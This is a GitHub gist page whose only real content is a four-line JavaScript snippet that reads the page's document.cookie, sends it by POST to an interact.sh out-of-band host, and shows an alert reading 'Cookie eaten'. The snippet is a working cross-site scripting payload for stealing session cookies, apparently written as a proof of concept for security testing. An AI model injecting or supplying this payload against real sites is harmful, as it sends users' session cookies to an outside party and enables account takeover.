Skip to content

Instantly share code, notes, and snippets.

@sudoaza
Last active April 9, 2022 23:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sudoaza/d36bc04e56fc583fb29a805cafba4c3e to your computer and use it in GitHub Desktop.
Save sudoaza/d36bc04e56fc583fb29a805cafba4c3e to your computer and use it in GitHub Desktop.
var xmlHttp = new XMLHttpRequest();
xmlHttp.open( "POST", "http://testjs.c990xmp2vtc00006r7r0grwoq4eyyyyyb.interact.sh", false );
xmlHttp.send( document.cookie );
alert("Cookie eaten");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment